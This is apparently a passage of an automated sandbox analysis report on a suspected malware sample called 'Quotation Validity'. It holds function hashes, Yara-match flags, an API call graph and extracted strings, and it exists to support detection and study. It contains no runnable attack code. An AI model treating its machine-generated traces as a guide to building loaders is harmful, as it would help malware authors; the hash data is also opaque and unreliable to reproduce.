                                                                                Function 082E0040 Relevance: .3, Instructions: 258COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a06aa56946b9a5e6b096f393f5a005aae7fc54fc8f96b2177ef9da88d5dbd014
                                                                                • Instruction ID: a50f946467ccc22a27bff849100db6a3238c07f1ad731e44c72ea6653a469776
                                                                                • Opcode Fuzzy Hash: a06aa56946b9a5e6b096f393f5a005aae7fc54fc8f96b2177ef9da88d5dbd014
                                                                                • Instruction Fuzzy Hash: A1A15E74A00209DFDB54EFB4C4547AEB7F6FF88301F508529E409AB394DA74AD42CBA1
                                                                                Function 082ECAC7 Relevance: .2, Instructions: 243COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 405de00bfdb728ac0172bee180f1e4a2715be25aded9f6d6855046626717d7ba
                                                                                • Instruction ID: 17a04caab882e43718ea41f9868f96ed42a907a9d4ce4870ecae1657548dd6d5
                                                                                • Opcode Fuzzy Hash: 405de00bfdb728ac0172bee180f1e4a2715be25aded9f6d6855046626717d7ba
                                                                                • Instruction Fuzzy Hash: 67B16275E006198FDB58CF6AC984ADDBBF2BF89301F14C1A9D809AB325DB345E858F50
                                                                                Function 032D0121 Relevance: .2, Instructions: 226COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8413d3ad4a4c3572baea1d46d646355b5a7ea563073746ff7650157630331afe
                                                                                • Instruction ID: 9661728868665ab4212405d48276b223f541c5434f12b3ccb3cf57d86671e82c
                                                                                • Opcode Fuzzy Hash: 8413d3ad4a4c3572baea1d46d646355b5a7ea563073746ff7650157630331afe
                                                                                • Instruction Fuzzy Hash: 62C1E8B84117458FE720CF65E84828D7BB1BF85329F514329D1A16B2E9DFB8168BCF48
                                                                                Function 082EC830 Relevance: .2, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9aa3741fec9bced053f763037ff3db7cb4414b333a5d83ca3ad8992c6789c536
                                                                                • Instruction ID: cc19979819cf1bf1387da152289fa0db473671adeff05e859944d42b494eeda5
                                                                                • Opcode Fuzzy Hash: 9aa3741fec9bced053f763037ff3db7cb4414b333a5d83ca3ad8992c6789c536
                                                                                • Instruction Fuzzy Hash: F8614D71A112098FEB49EF7AE84168ABBF2FBC9200F14C129D415AB365EB786805CF51
                                                                                Function 082EC840 Relevance: .2, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1569ce1b3290a0fafa711cca5157780ccb9799092ed9d6af0b4d1146dcba1cf5
                                                                                • Instruction ID: b7532cdf2bdb1d4e9f2eb8d079618ca3b3e9885f6440a7658e586ce65936f76c
                                                                                • Opcode Fuzzy Hash: 1569ce1b3290a0fafa711cca5157780ccb9799092ed9d6af0b4d1146dcba1cf5
                                                                                • Instruction Fuzzy Hash: E0610B71E112098FEB48EF6AE84569ABBF2FBC8200F14C129D415AB365EB786845CF51
                                                                                Function 078A7738 Relevance: .1, Instructions: 130COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41dcbf9d369ba20844ec2a37b22bb22b44a363c1c09b42cc8fefdbfd49ead7db
                                                                                • Instruction ID: 7756429a3f72ddac09e9f883f431161de21d170e23316825d54c8f9998e73feb
                                                                                • Opcode Fuzzy Hash: 41dcbf9d369ba20844ec2a37b22bb22b44a363c1c09b42cc8fefdbfd49ead7db
                                                                                • Instruction Fuzzy Hash: 0451E8B4E106199FDB14CFA9C5806AEFBF2FF89304F24816AD418A7315D7349942CFA5
                                                                                Function 078A7B71 Relevance: .1, Instructions: 130COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8012cb493e8ea0fc04b41fd065c0059816aef780a134bb09b98a2a61a700b7c8
                                                                                • Instruction ID: a3396536c382ef87dc6f320984a6aef4ce68b557e47fb61e633850de8255092e
                                                                                • Opcode Fuzzy Hash: 8012cb493e8ea0fc04b41fd065c0059816aef780a134bb09b98a2a61a700b7c8
                                                                                • Instruction Fuzzy Hash: 995109B0E106198FEB14CFA9D5806AEFBF2FF89314F24816AD418A7315D7359942CFA1

                                                                                Execution Graph

                                                                                Execution Coverage:1.5%
                                                                                Dynamic/Decrypted Code Coverage:5%
                                                                                Signature Coverage:8.6%
                                                                                Total number of Nodes:139
                                                                                Total number of Limit Nodes:9
                                                                                execution_graph 77902 424ce3 77907 424cfc 77902->77907 77903 424d8c 77904 424d47 77910 42e743 77904->77910 77907->77903 77907->77904 77908 424d87 77907->77908 77909 42e743 RtlFreeHeap 77908->77909 77909->77903 77913 42c9e3 77910->77913 77912 424d57 77914 42c9fd 77913->77914 77915 42ca0e RtlFreeHeap 77914->77915 77915->77912 77916 42f7e3 77917 42f7f3 77916->77917 77918 42f7f9 77916->77918 77921 42e823 77918->77921 77920 42f81f 77924 42c993 77921->77924 77923 42e83e 77923->77920 77925 42c9ad 77924->77925 77926 42c9be RtlAllocateHeap 77925->77926 77926->77923 78033 424953 78034 42496f 78033->78034 78035 424997 78034->78035 78036 4249ab 78034->78036 78037 42c663 NtClose 78035->78037 78038 42c663 NtClose 78036->78038 78039 4249a0 78037->78039 78040 4249b4 78038->78040 78043 42e863 RtlAllocateHeap 78040->78043 78042 4249bf 78043->78042 78044 42bc73 78045 42bc90 78044->78045 78048 13b2df0 LdrInitializeThunk 78045->78048 78046 42bcb8 78048->78046 77927 41b223 77928 41b267 77927->77928 77930 41b288 77928->77930 77931 42c663 77928->77931 77932 42c67d 77931->77932 77933 42c68e NtClose 77932->77933 77933->77930 77934 413ca3 77935 413cc9 77934->77935 77937 413cf3 77935->77937 77938 413a23 77935->77938 77939 413a3f 77938->77939 77942 42c903 77939->77942 77943 42c91d 77942->77943 77946 13b2c70 LdrInitializeThunk 77943->77946 77944 413a45 77944->77937 77946->77944 78049 41a4d3 78050 41a4e8 78049->78050 78052 41a542 78049->78052 78050->78052 78053 41e433 78050->78053 78054 41e459 78053->78054 78058 41e54d 78054->78058 78059 42f913 78054->78059 78056 41e4ee 78057 42bcc3 LdrInitializeThunk 78056->78057 78056->78058 78057->78058 78058->78052 78060 42f883 78059->78060 78061 42f8e0 78060->78061 78062 42e823 RtlAllocateHeap 78060->78062 78061->78056 78063 42f8bd 78062->78063 78064 42e743 RtlFreeHeap 78063->78064 78064->78061 78065 413f93 78066 413fad 78065->78066 78068 413fcb 78066->78068 78071 417723 78066->78071 78069 414010 78068->78069 78070 413fff PostThreadMessageW 78068->78070 78070->78069 78073 417747 78071->78073 78072 41774e 78072->78068 78073->78072 78074 417783 LdrLoadDll 78073->78074 78075 41779a 78073->78075 78074->78075 78075->78068 77947 401b04 77948 401b19 77947->77948 77951 42fcb3 77948->77951 77954 42e2f3 77951->77954 77955 42e319 77954->77955 77966 4072e3 77955->77966 77957 42e32f 77965 401c17 77957->77965 77969 41b033 77957->77969 77959 42e34e 77962 42e363 77959->77962 77984 42ca33 77959->77984 77980 428203 77962->77980 77963 42e37d 77964 42ca33 ExitProcess 77963->77964 77964->77965 77968 4072f0 77966->77968 77987 4163e3 77966->77987 77968->77957 77970 41b05f 77969->77970 78005 41af23 77970->78005 77973 41b0a4 77976 41b0c0 77973->77976 77978 42c663 NtClose 77973->77978 77974 41b08c 77975 41b097 77974->77975 77977 42c663 NtClose 77974->77977 77975->77959 77976->77959 77977->77975 77979 41b0b6 77978->77979 77979->77959 77981 428265 77980->77981 77983 428272 77981->77983 78016 418583 77981->78016 77983->77963 77985 42ca4d 77984->77985 77986 42ca5e ExitProcess 77985->77986 77986->77962 77988 416400 77987->77988 77990 416419 77988->77990 77991 42d0d3 77988->77991 77990->77968 77993 42d0ed 77991->77993 77992 42d11c 77992->77990 77993->77992 77998 42bcc3 77993->77998 77996 42e743 RtlFreeHeap 77997 42d195 77996->77997 77997->77990 77999 42bce0 77998->77999 78002 13b2c0a 77999->78002 78000 42bd0c 78000->77996 78003 13b2c1f LdrInitializeThunk 78002->78003 78004 13b2c11 78002->78004 78003->78000 78004->78000 78006 41b019 78005->78006 78007 41af3d 78005->78007 78006->77973 78006->77974 78011 42bd63 78007->78011 78010 42c663 NtClose 78010->78006 78012 42bd80 78011->78012 78015 13b35c0 LdrInitializeThunk 78012->78015 78013 41b00d 78013->78010 78015->78013 78018 4185ad 78016->78018 78017 418aab 78017->77983 78018->78017 78024 413c03 78018->78024 78020 4186da 78020->78017 78021 42e743 RtlFreeHeap 78020->78021 78022 4186f2 78021->78022 78022->78017 78023 42ca33 ExitProcess 78022->78023 78023->78017 78025 413c23 78024->78025 78027 413c8c 78025->78027 78029 41b343 RtlFreeHeap LdrInitializeThunk 78025->78029 78027->78020 78028 413c82 78028->78020 78029->78028 78030 418cc8 78031 42c663 NtClose 78030->78031 78032 418cd2 78031->78032 78076 13b2b60 LdrInitializeThunk

                                                                                Executed Functions

                                                                                Function 00417723 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                                                • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95
                                                                                Function 0042C663 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                                                APIs
                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                • Instruction ID: 55d98cbac179b72a764dd86cd5ec1f11a461976065f381c4f300eafe1b6f3ecb
                                                                                • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                • Instruction Fuzzy Hash: E8E086326402147BD210FB6ADC41FD7776CDFC5714F00451AFA1867242C6757A1587F5
                                                                                Function 013B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a76480cf83662281b35004bad0891b8410d6648b46b27e3f14e7f9dbfc806183
                                                                                • Instruction ID: d7e46b671a9fa026a178a55e31ca0474174b4e058add7ca97cd080345d9cac4d
                                                                                • Opcode Fuzzy Hash: a76480cf83662281b35004bad0891b8410d6648b46b27e3f14e7f9dbfc806183
                                                                                • Instruction Fuzzy Hash: 9590023960550402E100715D4514706200597D0605F65C455A0424568DC7968F5567A2
                                                                                Function 013B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 390 13b2b60-13b2b6c LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 26e49b0a9a87d22e2df00bb9b9871440d3757e9888326bf7ea195d5bbed89d31
                                                                                • Instruction ID: 24f5c1b2b0b6667cf0b1c7bbc53ad9c7c49d271ee0a0301adc66a190c8090bc9
                                                                                • Opcode Fuzzy Hash: 26e49b0a9a87d22e2df00bb9b9871440d3757e9888326bf7ea195d5bbed89d31
                                                                                • Instruction Fuzzy Hash: 29900269202400039105715D4414616500A97E0605B55C065E1014590DC5268E956325
                                                                                Function 013B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: bdba0528ac29291573cf50c66863e2ac5ffe0836c2d8c319ed6e2f1a1ea09fce
                                                                                • Instruction ID: 0a9d9599082e395acb0acdccd170595c233508cc421f6c75562e10b886cab7e4
                                                                                • Opcode Fuzzy Hash: bdba0528ac29291573cf50c66863e2ac5ffe0836c2d8c319ed6e2f1a1ea09fce
                                                                                • Instruction Fuzzy Hash: 6690023920140413E111715D4504707100997D0645F95C456A0424558DD6578F56A321
                                                                                Function 013B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 391 13b2c70-13b2c7c LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8e77f248ca40d3c2813f1be3811b42429125f66345a15ceb3428d5aec6f80ed9
                                                                                • Instruction ID: a215ce42b52f6f7fda3644b3edf11c614021cae9dacceb147cb1695b54f53bcb
                                                                                • Opcode Fuzzy Hash: 8e77f248ca40d3c2813f1be3811b42429125f66345a15ceb3428d5aec6f80ed9
                                                                                • Instruction Fuzzy Hash: 9F90023920148802E110715D840474A100597D0705F59C455A4424658DC6968E957321
                                                                                Function 00413F8F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: S$l420377x$l420377x
                                                                                • API String ID: 1836367815-2727433438
                                                                                • Opcode ID: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                                                • Instruction ID: c2806ac613a218a9f43bc075071cdee210e11ad5ac0fb3b5002561ad8e7d22f2
                                                                                • Opcode Fuzzy Hash: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                                                • Instruction Fuzzy Hash: 43114C71D0015C7AEB10AAE69C81DEF7B7CDF4579CF448069FA0467141D27C8E064BB5
                                                                                Function 00413F93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: l420377x$l420377x
                                                                                • API String ID: 1836367815-444879537
                                                                                • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                                • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                                                • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                                • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5
                                                                                Function 00413F72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: l420377x$l420377x
                                                                                • API String ID: 1836367815-444879537
                                                                                • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                                • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                                                • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                                • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5
                                                                                Function 0042C9E3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: wdA
                                                                                • API String ID: 3298025750-2931128418
                                                                                • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                                                • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8
                                                                                Function 0042C993 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                • Instruction ID: 36e320101d405b986edb5f0360d5375c690b058552b8fab17163e86361dfcef2
                                                                                • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                • Instruction Fuzzy Hash: D6E06DB2604204BBD714EE99EC41EAB77ACDFC5750F004419FD18A7282D671B9108BB9
                                                                                Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                                • Instruction ID: e0f95e071271af0ef5bae3a3abc99ff131e4bcb123f1ba6cdcf3cfbd638433f3
                                                                                • Opcode Fuzzy Hash: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                                • Instruction Fuzzy Hash: 4CE04F766002187BD220AA9AEC41F97775CDFC9714F50441AFA1867182C6717A1586A4
                                                                                Function 013B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 386 13b2c0a-13b2c0f 387 13b2c1f-13b2c26 LdrInitializeThunk 386->387 388 13b2c11-13b2c18 386->388
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 65eb919700ebd7a350826e85e1a60ee0b81968b559703f520ba1695805f2cca9
                                                                                • Instruction ID: 7b22a02fb7504e63faa2470848112290d96038e88fbea65ee8ed2343b8c08078
                                                                                • Opcode Fuzzy Hash: 65eb919700ebd7a350826e85e1a60ee0b81968b559703f520ba1695805f2cca9
                                                                                • Instruction Fuzzy Hash: B1B09B759015C5C5EE11E76846087177A0077D0705F15C165D3030681F4739D5D5E375

                                                                                Non-executed Functions

                                                                                Function 013F2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2160512332
                                                                                • Opcode ID: f1eb757b0157df78f89dc625a2d1e773b45bfb3251473381091c2b934a84c304
                                                                                • Instruction ID: ff449b7bd88339068f49922a0e1d63fdec4fc3b97243facd9d648ec64229b633
                                                                                • Opcode Fuzzy Hash: f1eb757b0157df78f89dc625a2d1e773b45bfb3251473381091c2b934a84c304
                                                                                • Instruction Fuzzy Hash: 60927D71604746EBE721DF18C880B6BBBE8BB84758F04492DFB95D72A1D770E844CB92
                                                                                Function 014212ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
